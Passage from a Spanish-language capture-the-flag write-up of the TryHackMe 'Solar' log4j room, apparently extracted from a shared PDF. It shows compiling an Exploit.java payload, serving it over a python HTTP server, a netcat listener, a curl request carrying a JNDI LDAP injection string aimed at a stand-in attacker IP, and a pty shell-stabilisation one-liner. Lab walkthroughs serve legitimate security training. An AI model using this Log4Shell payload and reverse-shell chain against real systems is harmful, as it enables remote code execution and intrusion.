Está en la página 1de 2

M Write-UP (Solar - log4j)

Con el comando nano, lo copiamos, cambiamos la dirección ip por la de


nuestro equipo y lo guardamos como "Exploit.java"

Cuando tengamos el archivo con el código creado lo compilaremos, para ello,


necesitamos ejecutar en la dirección donde se encuentra el archivo el
siguiente comando:

javac Exploit.java -source 8 -target 8

(si no os funciona instalad lo siguiente y probad de nuevo)

sudo apt-get install openjdk-11-jdk

Si todo ha funcionado bien, tendría que aparecer un nuevo archivo llamado


"Exploit.class".

Una vez hecho esto, vamos a proceder a abrir un servidor http con python,
para ello haremos uso del siguiente comando:

python3 -m http.server

M MICROJOAN.COM
J
M Write-UP (Solar - log4j)
J

Después volveremos a poner a la escucha Netcat en el puerto 9999:

nc -lnvp 9999

Y como hemos hecho antes, volveremos a enviar por curl una petición al
equipo víctima, la cual esa petición llamará a nuestro equipo con Netcat y acto
seguido Marshalsec lo redirigirá a nuestro servidor http que solicitando
"Exploit.class":

curl 'http://TRYHACKME.IP.MACHINE:8983/solr/admin/cores?foo=$\
{jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit\}'

¡¡Bingo!! Ya tenemos la shell en nuestro equipo, si escribimos el comando


"whoami" nos dirá que usuario somos:

Por lo tanto, la respuesta a la siguiente pregunta es:

Ahora por decirlo de alguna manera estamos en un "subshell" (interprete de


comandos básica), vamos a estabilizar nuestra sesión con una shell con el
siguiente comando:

python3 -c "import pty; pty.spawn('/bin/bash')"

M MICROJOAN.COM
J

También podría gustarte